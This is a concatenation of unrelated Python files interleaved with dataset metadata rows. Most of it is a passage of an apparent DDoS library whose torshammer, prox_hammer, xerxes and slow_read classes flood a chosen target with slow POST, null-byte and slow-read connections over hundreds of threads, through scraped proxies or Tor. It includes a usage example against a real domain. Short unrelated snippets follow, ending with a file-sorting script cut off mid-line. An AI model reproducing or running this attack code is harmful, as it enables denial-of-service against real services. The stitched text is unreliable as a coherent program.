line = random.choice(self.socks5list)
ipp = line.split(":")[0].split("=")[0]
pp = line.split(":")[1].split("=")[0]
s = socks.socksocket()
if z == "h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z == "s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z == "s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z == "h":
s.settimeout(self.timeout)
s.connect((self.target, self.port))
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min, self.round_max)):
if self.method == 3:
ty = random.randint(1, 2)
else:
ty = self.method
if ty == 1:
req = "GET"
else:
req = "POST"
m = setup_http_packet(
self.target,
ty,
self.paths,
self.post_field_min,
self.post_field_max,
self.post_min,
self.post_max,
self.cookie,
self.user_agents,
)
try:
if stop == True:
break
s.send(m.encode("utf-8"))
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rBot: {} | Request: {} | Type: {} | Bytes: {} ".format(
ipp, self.counter, req, len(m)
)
)
sys.stdout.flush()
# print("Bot: {} | Request: {} | Type: {} | Bytes: {}".format(ipp,lulzer_counter,req,len(m)))
time.sleep(self.interval)
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(0.1)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class torshammer:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
threads_daemon=True,
threads=500,
timeout=5,
tor=False,
duration=60,
logs=False,
max_content=15000,
min_content=10000,
):
self.counter = 0
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.max_content = max_content
self.min_content = min_content
self.stop = False
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.logs = logs
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout(self.timeout)
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rConnected to {}:{}...".format(self.target, self.port)
)
sys.stdout.flush()
# print("Connected to {}:{}...".format(self.target,self.port))
q = random.randint(self.min_content, self.max_content)
ck = ""
if self.cookie:
ck = "Cookie: " + self.cookie + "\r\n"
s.send(
reorder_headers_randomly(
"POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
random.choice(paths),
ck,
random.choice(self.user_agents),
random.randint(300, 1000),
q,
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
self.target,
)
).encode("utf-8")
)
for i in range(q):
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
h = random.choice(lis)
try:
s.send(h.encode("utf-8"))
if self.logs == True:
sys.stdout.write("\rPosted: {}".format(h))
sys.stdout.flush()
# print("Posted: {}".format(h))
time.sleep(random.uniform(0.1, 3))
except:
break
s.close()
except:
pass
self.counter -= 1
time.sleep(0.1)
if self.stop == True:
break
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class prox_hammer:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
threads_daemon=True,
scraping_timeout=15,
max_content=15000,
min_content=10000,
threads=700,
timeout=5,
http_list=None,
socks4_list=None,
socks5_list=None,
duration=60,
logs=True,
):
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.httplist = http_list
if not self.httplist and self.httplist != []:
self.httplist = masshttp(timeout=scraping_timeout)
self.socks4list = socks4_list
if not self.socks4list and self.socks4list != []:
self.socks4list = massocks4(timeout=scraping_timeout)
self.socks5list = socks5_list
if not self.socks5list and self.socks5list != []:
self.socks5list = massocks5(timeout=scraping_timeout)
self.stop = False
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.max_content = max_content
self.min_content = min_content
self.logs = logs
self.counter = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
bot_type = []
if len(self.httplist) > 0:
bot_type.append("h")
if len(self.socks4list) > 0:
bot_type.append("s4")
if len(self.socks5list) > 0:
bot_type.append("s5")
z = random.choice(bot_type)
if z == "h":
line = random.choice(self.httplist)
elif z == "s4":
line = random.choice(self.socks4list)
elif z == "s5":
line = random.choice(self.socks5list)
ipp = line.split(":")[0].split("=")[0]
pp = line.split(":")[1].split("=")[0]
s = socks.socksocket()
if z == "h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z == "s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z == "s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z == "h":
s.settimeout(self.timeout)
s.connect((self.target, self.port))
self.counter += 1
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
q = random.randint(self.min_content, self.max_content)
ck = ""
if self.cookie:
ck = "Cookie: " + cookie + "\r\n"
s.send(
reorder_headers_randomly(
"POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
random.choice(paths),
ck,
random.choice(self.user_agents),
random.randint(300, 1000),
q,
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
self.target,
)
).encode("utf-8")
)
for i in range(q):
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
h = random.choice(lis)
try:
s.send(h.encode("utf-8"))
if self.logs == True:
sys.stdout.write("\rPosted: {} --> {}".format(h, ipp))
sys.stdout.flush()
# print("Posted: {} --> {}".format(h,ipp))
time.sleep(random.uniform(0.1, 3))
except:
break
s.close()
except:
pass
self.counter -= 1
time.sleep(0.1)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class xerxes:
def __init__(
self,
u,
p=80,
threads_daemon=True,
threads=500,
timeout=5,
duration=60,
logs=False,
tor=False,
):
self.counter = 0
self.target = u
self.port = p
self.stop = False
self.duration = duration
self.timeout = timeout
self.tor = tor
self.start = time.time()
self.logs = logs
self.id_key = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
self.id_key += 1
except:
pass
def attack(self):
try:
x = self.id_key
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout(self.timeout)
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
self.counter += 1
"""if self.logs==True:
#print("[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.flush()"""
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send("\x00".encode("utf-8")) # send NULL character
if self.logs == True:
sys.stdout.write("\r[{}: Voly sent] ".format(x))
sys.stdout.flush()
except:
break
time.sleep(0.2)
except:
pass
self.counter -= 1
time.sleep(0.3)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class prox_xerxes:
def __init__(
self,
u,
scraping_timeout=15,
p=80,
threads_daemon=True,
threads=700,
timeout=5,
http_list=None,
socks4_list=None,
socks5_list=None,
duration=60,
logs=False,
):
self.httplist = http_list
if not self.httplist and self.httplist != []:
self.httplist = masshttp(timeout=scraping_timeout)
self.socks4list = socks4_list
if not self.socks4list and self.socks4list != []:
self.socks4list = massocks4(timeout=scraping_timeout)
self.socks5list = socks5_list
if not self.socks5list and self.socks5list != []:
self.socks5list = massocks5(timeout=scraping_timeout)
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.logs = logs
self.id_key = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
self.id_key += 1
except:
pass
def attack(self):
try:
x = self.id_key
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
bot_type = []
if len(self.httplist) > 0:
bot_type.append("h")
if len(self.socks4list) > 0:
bot_type.append("s4")
if len(self.socks5list) > 0:
bot_type.append("s5")
z = random.choice(bot_type)
if z == "h":
line = random.choice(self.httplist)
elif z == "s4":
line = random.choice(self.socks4list)
elif z == "s5":
line = random.choice(self.socks5list)
ipp = line.split(":")[0].split("=")[0]
pp = line.split(":")[1].split("=")[0]
s = socks.socksocket()
if z == "h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z == "s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z == "s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z == "h":
s.settimeout(self.timeout)
s.connect((self.target, self.port))
self.counter += 1
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send("\x00".encode("utf-8")) # send NULL character
if self.logs == True:
sys.stdout.write(
"\r[{}: Voly sent-->{}] ".format(x, ipp)
)
sys.stdout.flush()
except:
break
time.sleep(0.2)
except:
pass
self.counter -= 1
time.sleep(0.3)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
"""
this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.
it takes the following parameters:
u: target ip or domain
p: (set by default to: 80)
threads: (set by default to: 500) number of connections
timeout: (set by default to: 5) connection timeout flag
example:
>>>import bane
>>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)
"""
class slow_read:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
paths=["/"],
threads_daemon=True,
threads=500,
timeout=5,
min_speed=3,
max_speed=5,
max_read=3,
min_read=1,
logs=False,
tor=False,
duration=60,
):
self.counter = 0
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.stop = False
self.target = u
self.port = p
self.paths = paths
self.timeout = timeout
self.tor = tor
self.read_max = max_read
self.read_min = min_read
self.min_speed = min_speed
self.max_speed = max_speed
self.logs = logs
self.duration = duration
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout(self.timeout)
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send(
setup_http_packet(
self.target,
3,
self.paths,
2,
8,
10,
50,
self.cookie,
self.user_agents,
).encode("utf-8")
)
self.counter += 1
while True:
d = s.recv(random.randint(self.read_min, self.read_max))
if self.logs == True:
sys.stdout.write(
"\rReceived: {} ".format(
str(d.decode("utf-8").strip())
)
)
sys.stdout.flush()
# print("Received: {}".format(str(d.decode('utf-8'))))
time.sleep(random.randint(self.min_speed, self.max_speed))
except:
break
s.close()
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
"""
The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!
"""
| 34.110587 | 700 | 0.430297 | 5,178 | 50,586 | 4.105446 | 0.088837 | 0.014959 | 0.009032 | 0.010725 | 0.801581 | 0.784222 | 0.756609 | 0.742544 | 0.732854 | 0.714319 | 0 | 0.024462 | 0.473095 | 50,586 | 1,482 | 701 | 34.133603 | 0.773092 | 0.04521 | 0 | 0.846726 | 0 | 0.002976 | 0.036642 | 0.013727 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040923 | false | 0.023065 | 0.011161 | 0 | 0.08631 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1fef0391d1f2e1d4e570a65fa73396a69a54b023 | 162 | py | Python | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | from cancontroller.controller.nodes.alarm_controller import AlarmController
from cancontroller.controller.nodes.garage_door_controller import GarageDoorController | 81 | 86 | 0.919753 | 17 | 162 | 8.588235 | 0.588235 | 0.232877 | 0.369863 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 162 | 2 | 86 | 81 | 0.941935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1f6ad75991f462e6e967a6b1bfba5f36e69b5fe5 | 86 | py | Python | while_stmt.py | duduscript/pl0-compiler-ply- | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
] | 7 | 2017-11-10T14:49:57.000Z | 2021-07-20T12:34:32.000Z | while_stmt.py | duduscript/pl0 | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
] | null | null | null | while_stmt.py | duduscript/pl0 | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
] | 2 | 2018-11-20T23:50:38.000Z | 2021-11-14T19:23:57.000Z | def get_while_cond(ast):
return ast[1]
def get_while_stmt(ast):
return ast[2] | 17.2 | 24 | 0.697674 | 16 | 86 | 3.5 | 0.5625 | 0.214286 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.186047 | 86 | 5 | 25 | 17.2 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1f73aa1696d76310adf6cfed6403d4fc128d786b | 14,799 | py | Python | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | null | null | null | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | 1 | 2020-06-14T18:38:44.000Z | 2020-06-15T12:30:42.000Z | OneScript/Modified_File_Manager.py | hafeezarfi/ManageAndCrash | fad8cbb56c94f8ae5a134d5605c6731f995cf4da | [
"MIT"
] | 1 | 2020-06-14T16:14:29.000Z | 2020-06-14T16:14:29.000Z | # [warning: do not run this script in the partiiton where system files are stored]
# use it with caution
import os
import shutil
path = '/home/hafeez/Downloads/'
names = os.listdir(path)
folder_name = ['Images', 'Audio', 'Videos', 'Documents', 'Softwares','System']
for x in range(0,6):
if not os.path.exists(path+folder_name[x]):
os.makedirs(path+folder_name[x])
for (main_dir,sub_dir,file_in_sub_dir) in os.walk(path):
print(main_dir)
for files in file_in_sub_dir:
#Images
if ".svg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpeg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".bmp" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".png" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".gif" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".tiff" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".psd" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".raw" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
#Audio / Music
if ".mp3" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".m4a" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".wav" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
# Video / Movies
if ".mp4" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mkv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".webm" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mp2" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpeg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpe" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".ogg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4v" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4p" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".avi" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".wmv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mov" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".qt" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".flv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".swf" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
# Documents
if ".pdf" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xps" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".doc" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".docx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".pptx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xlsx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xml" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
# Software / Comperessed Packages
if ".exe" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".deb" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zip" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.gz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.xz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.bz2" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".iso" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".apk" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".app" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".7z" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zipx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rpm" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".sitx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rar" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".pkg" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
# System files
if ".cdd" in files and not os.path.exists(path+'System/'+files): # Conserved Domain Database
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dll" in files and not os.path.exists(path+'System/'+files): # Dynamic Link Library
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dlc" in files and not os.path.exists(path+'System/'+files): # Dlc
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".bin" in files and not os.path.exists(path+'System/'+files): # Binary
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cab" in files and not os.path.exists(path+'System/'+files): # Windows Cabinet File
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".sh" in files and not os.path.exists(path+'System/'+files): # Shell Script
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cgz" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".crash" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cur" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".deskthemepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".dmp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".drv" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ds_store" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fir" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fpbf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fw" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hlp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hpj" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ico" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".idx" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".its" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".key" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".lnk" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log1" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".metadata_never_index" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mi4" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mum" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nrl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pbp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pdr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pk2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ppm_b" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".prefpane" in files and not os.path.exists(path + 'System/' + files):
